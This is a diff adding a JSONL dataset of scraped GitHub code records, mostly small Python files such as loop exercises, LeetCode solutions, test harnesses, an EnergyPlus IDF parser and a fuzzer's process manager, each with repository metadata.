diff --git "a/2652.jsonl" "b/2652.jsonl" new file mode 100644--- /dev/null +++ "b/2652.jsonl" @@ -0,0 +1,787 @@ +{"seq_id":"29311744400","text":"\nspam = 0\nwhile spam < 5: #While loop that ends with a condition\n print('Hello World')\n spam += 1\n\n\n\nname = ''\nwhile name != 'your name': #While loop\n print('Please type your name: ')\n name = input()\nprint('Thank You!')\n\n\n\nwhile True: # Infinit Loop\n print('Please type your name: ')\n name = input()\n if name == 'your name':\n break #Breakpoints break out of the infinit loop\nprint('Thank You!')\n\n\nspam = 0\nwhile spam < 5:\n spam += 1\n print(spam)\n if spam == 3:\n continue #Jumps loop back to top\n print('Hello World')\n\n\n \n","repo_name":"rutrut6969/Automate-The-Boring-Stuff","sub_path":"While Loops.py","file_name":"While Loops.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28163803038","text":"import collections\n\n\ndef fourSumCount( A, B, C, D):\n # AB = collections.Counter(a + b for a in A for b in B)\n # return sum(AB[-c - d] for c in C for d in D)\n\n temp = [-a - b for a in A for b in B]\n AB = collections.Counter(temp)\n temp = [c + d for c in C for d in D]\n result = sum(AB[i] for i in temp)\n return result\n\n\n\n\nA = [ 1, 2]\nB = [-2,-1]\nC = [-1, 2]\nD = [ 0, 2]\n\nresult = fourSumCount(A, B, C, D)\nprint(result)","repo_name":"kobewangSky/LeetCode","sub_path":"454. 4Sum II.py","file_name":"454. 4Sum II.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27369502438","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nif __name__ == '__main__':\n attn_dir = \"attn_weight/hubert_asr_pre10_short\"\n attn_pths = [os.path.join(attn_dir, f\"layer{i}.pt\") for i in range(1)]\n prompt_len = 10\n\n for i in range(1):\n print(i)\n attn = torch.load(attn_pths[i]) # (1, 168, 168)\n attn = attn.squeeze(0).numpy() # (168, 168) (prompt_len + seq_len, prompt_len + seq_len)\n lambdas = []\n for j in range(attn.shape[0]):\n print(np.sum(attn[j][:prompt_len]))\n lambdas.append(np.sum(attn[j][:prompt_len]))\n","repo_name":"cyingliu/prompt-speech-ssl-model","sub_path":"s3prl/s3prl/analyze_attn.py","file_name":"analyze_attn.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16340007479","text":"#\n#\nimport os\nimport platform\nimport re\nfrom autotest.client import test, utils\n\nclass ubuntu_fan_smoke_test(test.test):\n version = 1\n\n def install_required_pkgs(self):\n arch = platform.processor()\n try:\n series = platform.dist()[2]\n except AttributeError:\n import distro\n series = distro.codename()\n\n pkgs = [\n 'docker.io',\n 'gdb',\n 'git',\n 'net-tools',\n 'ubuntu-fan',\n ]\n\n cmd = 'yes \"\" | DEBIAN_FRONTEND=noninteractive apt-get install --yes --force-yes ' + ' '.join(pkgs)\n self.results = utils.system_output(cmd, retain_output=True)\n\n def initialize(self):\n pass\n\n def setup(self):\n self.install_required_pkgs()\n\n def determine_underlay(self):\n underlay = 'bogus'\n cmd = 'ip address'\n output = utils.system_output(cmd, retain_output=False)\n for line in output.split('\\n'):\n m = re.search('inet (\\d+\\.\\d+)\\.\\d+\\.\\d+\\/\\d+ brd \\d+\\.\\d+\\.\\d+\\.\\d+ scope', line)\n if m:\n underlay = '%s.0.0/16' % m.group(1)\n break\n return underlay\n\n def run_once(self, test_name):\n\n underlay = self.determine_underlay()\n\n os.chdir(self.bindir)\n cmd = './ubuntu_fan_smoke_test.sh %s' % (underlay)\n self.results = utils.system_output(cmd, retain_output=True)\n\n print(self.results)\n\n# vi:set ts=4 sw=4 expandtab syntax=python:\n","repo_name":"ColinIanKing/autotest-client-tests","sub_path":"ubuntu_fan_smoke_test/ubuntu_fan_smoke_test.py","file_name":"ubuntu_fan_smoke_test.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"73328920410","text":"import sys\n\nfrom phenix_apps.schedulers import SchedulerBase\n\n\nclass SingleNode(SchedulerBase):\n def __init__(self):\n SchedulerBase.__init__(self, 'single-node')\n\n spec = self.experiment.spec\n hosts = self.experiment.hosts\n\n for vm in spec.topology.nodes:\n hostname = vm.general.hostname\n\n if hostname in spec.schedules:\n continue\n\n spec.schedules.hostname = hosts[0].name\n\n print(self.experiment.to_json())\n\n\ndef main():\n SingleNode()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sandialabs/sceptre-phenix-apps","sub_path":"src/python/phenix_apps/schedulers/single_node/single_node.py","file_name":"single_node.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"17999285737","text":"from dotenv import find_dotenv, load_dotenv\nimport os, json\n\n\n# INITIALIZING ENV VARIABLE TO MAKE ACCESSIBLE TO WHOLE APPLICATION\ndef env_var_config():\n # finding env file location / path\n dotenv_path = find_dotenv()\n\n # loading environment variables\n load_dotenv(dotenv_path)\n\n # returning env variables by converting in json\n env_variables = {\n \"upload\": os.getenv(\"ASSEMBLY_UPLOAD_URL\"),\n \"transcribe\": os.getenv(\"ASSEMBLY_TRANSCRIBE_URL\"),\n \"api_key\": os.getenv(\"ASSEMBLY_API_KEY\"),\n }\n\n return env_variables\n","repo_name":"mdazlaanzubair/odiotex-api-python","sub_path":"helpers/envConfig.py","file_name":"envConfig.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24850750705","text":"from graphics import *\n\n\ndef encode_msg():\n width = 400\n height = 400\n win = GraphWin(\"Vigenere\", width, height)\n win.setBackground('light gray')\n\n text_pt1 = Point(75, 100)\n text1 = Text(text_pt1, \"Message to code: \")\n input_box1 = Entry(Point(250, 100), 30)\n input_box1.draw(win)\n text1.draw(win)\n text1.setTextColor(\"black\")\n\n text_pt = Point(100, 150)\n text = Text(text_pt, \"Enter Keyword: \")\n input_box = Entry(Point(250, 150), 20)\n input_box.draw(win)\n text.draw(win)\n text.setTextColor(\"black\")\n\n button = Rectangle(Point(150, 200), Point(300, 250))\n text2 = Text(Point(225, 225), 'Encode')\n button.setFill('white')\n button.draw(win)\n text2.draw(win)\n\n win.getMouse()\n button.undraw()\n text2.undraw()\n\n msg = input_box1.getText()\n key = input_box.getText()\n msg = msg.upper().replace(' ', '')\n key = key.upper().replace(' ', '')\n\n encoded_str = ''\n for i in range(len(msg)):\n msg_ord = (ord(msg[i])) - 65\n key_ord = (ord(key[i % len(key)])) - 65\n total = (msg_ord + key_ord) % 58\n new_ord = total + 65\n encoded_chr = (chr(new_ord))\n encoded_str = encoded_str + encoded_chr\n\n text3 = Text(Point(215, 225), encoded_str)\n text3.draw(win)\n\n msg = Text(Point(200, 350), 'Click anywhere to close')\n msg.draw(win)\n win.getMouse()\n win.close()\n\n\n\n\n\n","repo_name":"tgbzwt16/220","sub_path":"labs/lab6/lab6.py","file_name":"lab6.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42869968388","text":"#!/usr/bin/env python2\n\nimport signal\nimport random\n\nfrom multiprocessing import Process, Queue\n\nfrom . import clientfuzzerslave\nimport utils\n\n\ndef doFuzz(config, useCurses):\n \"\"\"\n Client Fuzzing main parent.\n\n this is the main entry point for project fuzzers\n receives data from fuzzing-children via queues\n \"\"\"\n q = Queue()\n # have to remove sigint handler before forking children\n # so ctlr-c works\n orig = signal.signal(signal.SIGINT, signal.SIG_IGN)\n\n inputs = utils.loadInputs(config)\n\n procs = []\n n = 0\n\n if \"fuzzer_nofork\" in config and config[\"fuzzer_nofork\"]:\n r = random.randint(0, 2**32 - 1)\n fuzzingSlave = clientfuzzerslave.FuzzingSlave(config, n, q, r)\n fuzzingSlave.doActualFuzz()\n else:\n while n < config[\"processes\"]:\n print(\"Start child: \" + str(n))\n r = random.randint(0, 2**32 - 1)\n fuzzingSlave = clientfuzzerslave.FuzzingSlave(config, n, q, r, inputs)\n p = Process(target=fuzzingSlave.doActualFuzz, args=())\n procs.append(p)\n p.start()\n n += 1\n\n # restore signal handler\n signal.signal(signal.SIGINT, orig)\n\n print(\"Thread# Fuzz/s Count Crashes\")\n while True:\n try:\n r = q.get()\n print(\"%d: %4.2f %8d %5d\" % r)\n except KeyboardInterrupt:\n # handle ctrl-c\n for p in procs:\n p.terminate()\n p.join()\n\n break\n\n print(\"Finished\")\n","repo_name":"dobin/ffw","sub_path":"clientfuzzer/clientfuzzermaster.py","file_name":"clientfuzzermaster.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"32"} +{"seq_id":"32854816113","text":"from sys import stdin, stdout\r\n\r\ntc = int(stdin.readline())\r\nwhile tc:\r\n tc -= 1\r\n n, player = map(int, stdin.readline().split())\r\n if n == 1:\r\n if player == 0:\r\n print(\"Airborne wins.\")\r\n if player == 1:\r\n print(\"Pagfloyd wins.\")\r\n else:\r\n if player == 1:\r\n print(\"Pagfloyd wins.\")\r\n else:\r\n print(\"Airborne wins.\")","repo_name":"OmkarSharan/Spoj","sub_path":"Hubullu.py","file_name":"Hubullu.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9946679190","text":"class Solution:\n def topKFrequent(self, words: List[str], k: int) -> List[str]:\n counter = Counter(words)\n heap = []\n \n for key, count in counter.items():\n heappush(heap, [-1 *count, key])\n \n answer = []\n for i in range(k):\n count, key = heappop(heap)\n answer.append(key)\n \n return answer","repo_name":"Gizaw-Agodo/A2sV","sub_path":"0692-top-k-frequent-words/0692-top-k-frequent-words.py","file_name":"0692-top-k-frequent-words.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"40260297169","text":"# from sklearn.model_selection import train_test_split\n# from sklearn import metrics\n# from sklearn.feature_extraction.text import CountVectorizer,TfidfTransformer\nfrom pandas import read_csv\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import accuracy_score\n\nimport sys\n\nsys.path.append('.')\nsys.path.append('../')\nsys.path.append('../../')\nfrom config.config import cfg\n\n\nclass XgboostPredict:\n\n def predict(self, csv_file):\n pkl_file = cfg.xgboost.pkl_file\n dataset = read_csv(csv_file, index_col=0)\n classes = cfg.xgboost.classes\n X = dataset.iloc[:, 1:]\n y = dataset.iloc[:, 0]\n x_test = X\n y_test = y\n with open(pkl_file, 'rb') as f:\n model = joblib.load(f)\n\n def confusion_accuracy(x_test, y_true, model):\n y_pred = model.predict(x_test)\n cm = confusion_matrix(y_true=y_true, y_pred=y_pred)\n cr = classification_report(y_true=y_true, y_pred=y_pred)\n acc = accuracy_score(y_true=y_true, y_pred=y_pred)\n print('Model name:', model.__class__.__name__)\n print(model.__class__.__name__ + ' confusion_matrix:\\n', cm)\n print(model.__class__.__name__ + ' classification_report:\\n', cr)\n print(model.__class__.__name__ + ' classification_report:', acc)\n print(\n model.__class__.__name__ + ' classification_report: predict {}, accuracy {}'.format(classes[y_pred[0]],\n acc))\n return classes[y_pred[0]]\n\n return confusion_accuracy(x_test, y_test, model)\n","repo_name":"WyHy/Pathological_Cell_Tracker","sub_path":"models/xgboost/xgboost_predict.py","file_name":"xgboost_predict.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23477478806","text":"'''\nhttps://www.acmicpc.net/problem/7568\n덩치\n[풀이]\n'''\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nhuge = [list(map(int, input().split())) for _ in range(n)]\nscore = [[huge[idx][0] < huge[jdx][0] and huge[idx][1] < huge[jdx][1] for jdx in range(n)].count(True) for idx in range(n)]\nprint(*[s+1 for s in score], end=' ')\n","repo_name":"sangmandu/SangSangPlus","sub_path":"Algorithm/SANGMIN/CLASS 2/7568.py","file_name":"7568.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"30006175974","text":"class Solution(object):\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n if len(intervals) <=1:\n return intervals\n \n def get_first(a_list):\n return a_list[0]\n intervals.sort(key=get_first)\n\n result = [intervals[0]]\n for i in range(1,len(intervals)):\n if result[-1][1] >= intervals[i][0]:\n result[-1] = [result[-1][0],max(result[-1][1],intervals[i][1])]\n else:\n result.append(intervals[i])\n return result\n\ns = Solution()\nresult = s.merge([[1,4],[0,4]])\nprint(result)\n ","repo_name":"JoanWu5/Leetcode-Solution","sub_path":"56-Merge-Intervals.py","file_name":"56-Merge-Intervals.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25942363291","text":"# You have two input files. One is, practice.txt\n# and the other is data.txt. Some expected answers\n# for practice.txt are provided here in this\n# file. You will have to answer the questions\n# on Blackboard using data.txt.\n\n# Complete coding for this file using the data\n# in practice.txt. Check if the results match\n# with the results provided in the comments.\n\n# Answer the questions on Blackboard using\n# the data.txt file as the input data. Submit\n# the completed code file on Blackboard.\n\nimport pandas as pd\nimport numpy as np\n# Create a dataframe from csv\ndf = pd.read_csv('practice.txt', delimiter='\\t')\n\nmyData = df.values\n\ndef minMaxVec(vec1,vec2):\n #for jaccard\n minimums=[]\n maximums=[]\n for i in range(0, len(vec1)):\n minimums.append(min( vec1[i] , vec2[i]))\n for i in range(0, len(vec1)):\n maximums.append(max( vec1[i] , vec2[i]))\n return minimums, maximums\n\n\ndef euclid(vec1, vec2):\n ### Write your code here and return an appropriate value\n euclidean_dist = np.sqrt(np.sum((vec1-vec2)**2))\n return euclidean_dist\n #return None\n\ndef manhattan_distance(vec1, vec2):\n ### Write your code here and return an appropriate value\n man_dist = np.sum(abs(vec1-vec2))\n return man_dist\n #return None\n\ndef jaccard(vec1, vec2):\n ### Write your code here and return an appropriate value\n minimums, maximums = minMaxVec(vec1,vec2)\n jaccard = sum(minimums)/sum(maximums);\n return jaccard\n #return None\n\ndef cosine(vec1, vec2):\n ### Write your code here and return an appropriate value\n numerator = np.dot(vec1 , vec2)\n denominator = np.sqrt(sum(vec1**2))* np.sqrt(sum(vec2**2))\n cosinesim = numerator/denominator\n return cosinesim\n #return None\n\ndef tanimoto(vec1, vec2):\n ### Write your code here and return an appropriate value\n numerator = np.dot( vec1 , vec2)\n denominator = (sum(vec1**2)+sum(vec2**2))-numerator\n tanimoto = numerator/denominator\n return tanimoto\n #return None\n\ndef sortkey(item):\n return item[1]\n\ndef knearest(vec, data, k, method):\n # Write code to return the indices of k nearest\n # neighbors of vec in data using method\n result = []\n if method == \"euclidean\":\n for row in range (0, len(data)):\n distance = euclid(vec, data[row])\n result.append([row, distance])\n elif method == \"manhattan\":\n for row in range (0, len(data)):\n distance = manhattan_distance(vec, data[row])\n result.append([row, distance])\n sortedResult = sorted(result, key=sortkey)\n indicies = []\n if k str:\n l = clear_list(l)\n l_str = \" \".join(l)\n return re.sub(' +', ' ', l_str)","repo_name":"lambdina/scraping_engine","sub_path":"scraping_engine/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71739422490","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\n\n@Date : Fri Nov 14 13:20:38 2014 \\n\n@Author : Erwan Ledoux \\n\\n\n\n\n\nThe Conditioner\n\n\"\"\"\n\n\n#\nimport ShareYourSystem as SYS\nBaseModuleStr=\"ShareYourSystem.Standards.Objects.Debugger\"\nDecorationModuleStr=\"ShareYourSystem.Standards.Classors.Representer\"\nSYS.setSubModule(globals())\n#\n\n#\nRepresenter=DecorationModule\n#\n\n#\n@DecorationClass()\nclass ConditionerClass(BaseClass):\n\n\t#Definition\n\tRepresentingKeyStrsList=[\n\t\t\t\t\t\t\t\t\t'ConditioningTestVariable',\n\t\t\t\t\t\t\t\t\t'ConditioningGetBoolFunction',\n\t\t\t\t\t\t\t\t\t'ConditioningAttestVariable',\n\t\t\t\t\t\t\t\t\t'ConditioningInstanceVariable',\n\t\t\t\t\t\t\t\t\t'ConditioningTypesList',\n\t\t\t\t\t\t\t\t\t'ConditionedIsBool',\n\t\t\t\t\t\t\t\t]\n\t\n\tdef default_init(self,\n\t\t\t\t\t\t_ConditioningTestVariable=None,\n\t\t\t\t\t\t_ConditioningGetBoolFunction=None,\n\t\t\t\t\t\t_ConditioningAttestVariable=None,\n\t\t\t\t\t\t_ConditioningInstanceVariable=None,\n\t\t\t\t\t\t_ConditioningTypesList=[type(len),type(type)],\n\t\t\t\t\t\t_ConditionedIsBool=True,\n\t\t\t\t\t\t**_KwargVariablesDict\n\t\t\t\t\t):\n\t\t\n\t\t#Call the parent init method\n\t\tBaseClass.__init__(self,**_KwargVariablesDict)\n\t\t\n\tdef do_condition(self):\n\n\t\t#debug\n\t\tself.debug(\n\t\t\t\t('self.',self,[\n\t\t\t\t\t'ConditioningInstanceVariable',\n\t\t\t\t\t'ConditioningTestVariable'\n\t\t\t\t])\n\t\t\t)\n\n\t\t#Check\n\t\tif self.ConditioningInstanceVariable!=None:\n\n\t\t\t#Check\n\t\t\tif self.ConditioningTestVariable in self.ConditioningTypesList:\n\n\t\t\t\t#call\n\t\t\t\tself.ConditioningTestVariable=self.ConditioningTestVariable(\n\t\t\t\t\t\tself.ConditioningInstanceVariable\n\t\t\t\t\t)\n\n\t\t\telse:\n\t\t\t\t\n\t\t\t\t#try\n\t\t\t\ttry:\n\n\t\t\t\t\t#get\n\t\t\t\t\tself.ConditioningTestVariable=self.ConditioningInstanceVariable[\n\t\t\t\t\t\tself.ConditioningTestVariable\n\t\t\t\t\t]\n\n\t\t\t\texcept:\n\n\t\t\t\t\t#pass\n\t\t\t\t\tpass\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,[\n\t\t\t\t\t\t\t\t\t'ConditioningTestVariable',\n\t\t\t\t\t\t\t\t\t'ConditioningAttestVariable'\n\t\t\t\t\t\t\t\t]))\n\t\t'''\n\t\t\n\t\t#call\n\t\tself.ConditionedIsBool=self.ConditioningGetBoolFunction(\n\t\t\tself.ConditioningTestVariable,\n\t\t\tself.ConditioningAttestVariable\n\t\t)\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,['ConditionedIsBool']))\n\t\t'''\n\t\t\n#\n\n","repo_name":"Ledoux/ShareYourSystem","sub_path":"Pythonlogy/draft/Conditioner/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8810533483","text":"from dal import autocomplete, forward\nfrom .models import fechaCalendario, CategoryStudy, etiquetasCar\nfrom django import forms\n\n\nclass fechaCalendarioForm(forms.ModelForm):\n\n class Meta:\n model = fechaCalendario\n fields = ('fechaCa', )\n # widgets = {\n # 'fechaCalendario': autocomplete.ModelSelect2Multiple(\n # url='linked_data_rf',\n # forward=(forward.Field(src=\"cat_estudio\", dst=\"possessor\"),\n # forward.Const(val=42, dst=\"secret\"))\n # )\n # }\n\n# Etiquetas Cartelera\nclass EtiquetasCartForm(forms.ModelForm):\n\n class Meta:\n model = etiquetasCar\n fields = ('name', 'cat_estudio')\n widgets = {\n 'cat_estudio': autocomplete.ModelSelect2Multiple(\n # url='linked_data_rf',\n forward=(forward.Field(src=\"cat_estudio\", dst=\"possessor\"),\n forward.Const(val=42, dst=\"secret\"))\n )\n }\n\nclass AutocompleteEtiquetasForm(forms.ModelForm):\n\n class Meta:\n model = etiquetasCar\n fields = ('__all__')\n widgets = {\n 'etiquetasCartelera': autocomplete.ModelSelect2Multiple(\n 'etiquetasCartelera-autocomplete'\n )\n }","repo_name":"Rood17/CAWebApp","sub_path":"cartelera/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24586576568","text":"import os, copy, time,subprocess,traceback\nFD = os.path.dirname(os.path.realpath(__file__))\nEPLUS_PATH = {'8_3':FD + '/../../eplus-env/eplus_env/envs/EnergyPlus-8-3-0'}\nWEATHER_PATH_DF = FD + '/../../eplus-env/eplus_env/envs/weather/pittsburgh.epw'\n\nclass IdfParser(object):\n\n\tdef __init__(self, idf_dir, version='8_3'):\n\t\tself._idf_dir = idf_dir;\n\t\t# idf_dict is:\n\t\t# {idf_class_name:[obj_content_str, obj_content_str]}\n\t\tself._idf_dict = {};\n\t\tself._version = version;\n\t\tself._parser_idf();\n\n\tdef _parser_idf(self):\n\t\twith open(self._idf_dir, 'r') as idf_file:\n\t\t\tidf_lines = idf_file.readlines();\n\t\t\tis_obj_start = False;\n\t\t\tobj_content = '';\n\t\t\tobj_name = '';\n\t\t\tfor idf_line in idf_lines:\n\t\t\t\tidf_line_prcd = idf_line.split('\\n')[0].split('!')[0].strip();\n\t\t\t\tif is_obj_start == False:\n\t\t\t\t\tif len(idf_line_prcd) > 0:\n\t\t\t\t\t\tif idf_line_prcd[-1] == ',':\n\t\t\t\t\t\t\tobj_name = idf_line_prcd[:-1];\n\t\t\t\t\t\t\tis_obj_start = True;\n\t\t\t\t\t\telif idf_line_prcd[-1] == ';':\n\t\t\t\t\t\t\tobj_name = idf_line_prcd[0:idf_line_prcd.find(',')];\n\t\t\t\t\t\t\tobj_content = idf_line_prcd[idf_line_prcd.find(',') + 1:];\n\t\t\t\t\t\t\tif obj_name in self._idf_dict:\n\t\t\t\t\t\t\t\tself._idf_dict[obj_name].append(obj_content);\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself._idf_dict[obj_name] = [obj_content];\n\t\t\t\t\t\t\t# Reset obj temp fields\n\t\t\t\t\t\t\tis_obj_start = False;\n\t\t\t\t\t\t\tobj_content = '';\n\t\t\t\t\t\t\tobj_name = '';\n\t\t\t\telse:\n\t\t\t\t\tobj_content += idf_line;\n\t\t\t\t\tif len(idf_line_prcd) > 0:\n\t\t\t\t\t\tif idf_line_prcd[-1] == ';':\n\t\t\t\t\t\t\tif obj_name in self._idf_dict:\n\t\t\t\t\t\t\t\tself._idf_dict[obj_name].append(obj_content);\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself._idf_dict[obj_name] = [obj_content];\n\t\t\t\t\t\t\t# Reset obj temp fields\n\t\t\t\t\t\t\tis_obj_start = False;\n\t\t\t\t\t\t\tobj_content = '';\n\t\t\t\t\t\t\tobj_name = '';\n\n\tdef write_idf(self, to_write_dir):\n\t\tto_write_str = '';\n\t\t# Construct the string to write\n\t\tfor idf_obj_name in self._idf_dict:\n\t\t\tobj_contents = self._idf_dict[idf_obj_name];\n\t\t\tfor obj_content in obj_contents:\n\t\t\t\tto_write_str += idf_obj_name + ',\\n';\n\t\t\t\tto_write_str += obj_content + '\\n';\n\t\twith open(to_write_dir, 'w') as idf_file:\n\t\t\tidf_file.write(to_write_str);\n\n\tdef write_object_in_idf(self, to_write_dir, object_name):\n\t\tto_write_str = '';\n\t\t# Construct the string to write\n\t\tobj_contents = self._idf_dict[object_name];\n\t\tfor obj_content in obj_contents:\n\t\t\tto_write_str += object_name + ',\\n';\n\t\t\tto_write_str += obj_content + '\\n';\n\t\twith open(to_write_dir, 'w') as idf_file:\n\t\t\tidf_file.write(to_write_str);\n\n\n\tdef remove_objects_all(self, class_name):\n\t\tself._idf_dict.pop(class_name);\n\n\tdef get_obj_reference_count(self, obj_name):\n\t\tref_ct = 0;\n\t\tfor key, value in self._idf_dict.items():\n\t\t\tfor obj in value:\n\t\t\t\tobj_lines = obj.split(',')[1: ] # Exclude the obj name itself from the reference\n\t\t\t\tfor obj_line in obj_lines:\n\t\t\t\t\t# Remove \\n \n\t\t\t\t\tnl_sps = obj_line.split('\\n');\n\t\t\t\t\tnl_free = nl_sps[1] if len(nl_sps) > 2 else nl_sps[-1]; # Handle the line with ;\n\t\t\t\t\teffc_obj_line = nl_free.split(';')[0].strip();\n\t\t\t\t\tif obj_name == effc_obj_line: \n\t\t\t\t\t\tref_ct += 1;\n\t\treturn ref_ct;\n\n\n\tdef remove_object(self, class_name, obj_name):\n\t\ttry:\n\t\t\ttgt_objects = self._idf_dict[class_name];\n\t\t\ttgt_idx = 0;\n\t\t\tfor obj in tgt_objects:\n\t\t\t\tobj_name_this = self.get_object_name(obj);\n\t\t\t\tif obj_name_this == obj_name:\n\t\t\t\t\tbreak;\n\t\t\t\telse:\n\t\t\t\t\ttgt_idx += 1;\n\t\t\tself._idf_dict[class_name].pop(tgt_idx);\n\t\texcept Exception as e:\n\t\t\tprint('Func: remove_object, args:(%s, %s), error: %s'%(class_name, obj_name, traceback.format_exc()))\n\n\tdef get_object_name(self, object_content):\n\t\tobj_name = object_content.split(',')[0].split('\\n')[-1].strip();\n\t\treturn obj_name;\n\n\tdef get_schedule_type_init_value(self, schedule_name):\n\t\tschedule_content = None;\n\t\tfor cmp_schedule_content in self._idf_dict['Schedule:Compact']:\n\t\t\tif self.get_object_name(cmp_schedule_content) == schedule_name:\n\t\t\t\tschedule_content = cmp_schedule_content;\n\t\t\t\tbreak;\n\t\tschedule_content = schedule_content.split(';')[0].split(',');\n\t\tschedule_type = schedule_content[1].split('\\n')[-1].strip();\n\t\t# Schedule init value\n\t\tfor schedule_line_i in schedule_content[2:]:\n\t\t\ttry:\n\t\t\t\tinit_value = float(schedule_line_i.split('\\n')[-1].strip());\n\t\t\t\tbreak;\n\t\t\texcept Exception as e:\n\t\t\t\tpass;\n\t\treturn (schedule_type, init_value);\n\n\n\tdef get_all_compact_schedules_names(self):\n\t\treturned_list = [];\n\t\tfor cmp_schedule_content in self._idf_dict['Schedule:Compact']:\n\t\t\treturned_list.append(self.get_object_name(cmp_schedule_content));\n\t\treturn returned_list;\n\n\tdef localize_schedule(self, local_file_path):\n\t\tfile_name = local_file_path.split(os.sep)[-1];\n\t\tfile_dir = local_file_path[:local_file_path.rfind(os.sep)];\n\t\tsch_file_contents = self._idf_dict['Schedule:File'];\n\t\tcontent_i = 0;\n\t\tfor sch_file_obj in copy.deepcopy(sch_file_contents):\n\t\t\tif file_name in sch_file_obj:\n\t\t\t\tfile_name_st_idx = sch_file_obj.rfind(file_name);\n\t\t\t\tfull_path_st_idx = sch_file_obj.rfind(',', 0, file_name_st_idx);\n\t\t\t\tsch_file_obj = sch_file_obj[0:full_path_st_idx] + ',\\n' + file_dir + '/' + sch_file_obj[file_name_st_idx:];\n\t\t\t\tsch_file_contents[content_i] = sch_file_obj;\n\t\t\tcontent_i += 1;\n\t\tself._idf_dict['Schedule:File'] = sch_file_contents;\n\n\tdef is_contain_filesch(self):\n\t\tresult = 'Schedule:File' in self._idf_dict\n\t\treturn (result);\n\n\tdef add_objects(self, dict_to_add):\n\t\tfor key in dict_to_add:\n\t\t\tobjects_to_add = dict_to_add[key];\n\t\t\tif key in self._idf_dict:\n\t\t\t\tself._idf_dict[key].extend(objects_to_add);\n\t\t\telse:\n\t\t\t\tself._idf_dict[key] = objects_to_add;\n\n\tdef add_dxf_output(self):\n\t\tself._idf_dict['Output:Surfaces:Drawing'] = ['DXF,!- Report Type\\n'+\n\t\t\t\t\t\t\t\t\t\t\t\t\t 'Triangulate3DFace;\\n'];\n\n\tdef set_minimum_run(self):\n\t\tself._idf_dict['SimulationControl'] = ['Yes,!- Do Zone Sizing Calculation\\n' +\n \t\t\t\t\t\t\t\t\t'No,!- Do System Sizing Calculation\\n' +\n 'No,!- Do Plant Sizing Calculation\\n' +\n \t\t\t\t\t\t\t\t\t'No,!- Run Simulation for Sizing Periods\\n' +\n \t\t\t\t\t\t\t\t\t'No;!- Run Simulation for Weather File Run Periods\\n'];\n\t\tif 'Schedule:File' in self._idf_dict:\n\t\t\tself._idf_dict.pop('Schedule:File', None);\n\n\tdef run_eplus_minimum(self, out_dir):\n\t\teplus_path_this = EPLUS_PATH[self._version];\n\t\tif not os.path.isdir(FD + '/tmp'):\n\t\t\tos.makedirs(FD + '/tmp');\n\t\tidf_dir = FD + '/tmp/%s.idf'%(time.time());\n\t\tself.write_idf(idf_dir);\n\t\tprint ('%s -w %s -d %s %s'\n\t\t\t\t\t\t%(eplus_path_this + '/energyplus', WEATHER_PATH_DF, \n out_dir, idf_dir))\n\t\teplus_process = subprocess.call('%s -w %s -d %s %s'\n\t\t\t\t\t\t%(eplus_path_this + '/energyplus', WEATHER_PATH_DF, \n out_dir, idf_dir),\n shell = True,\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE,\n preexec_fn=os.setsid)\n\n\n \n\n\n\n\t@property\n\tdef idf_dict(self):\n\t\treturn self._idf_dict\n\t\n\n\n\n\n\n\n","repo_name":"zhangzhizza/HVAC-RL-Control","sub_path":"src/eplus-env-util/eplus_env_util/idf_parser.py","file_name":"idf_parser.py","file_ext":"py","file_size_in_byte":6831,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"32"} +{"seq_id":"8650228215","text":"# pessoa = {chave: valor}\r\n# chave = indica o 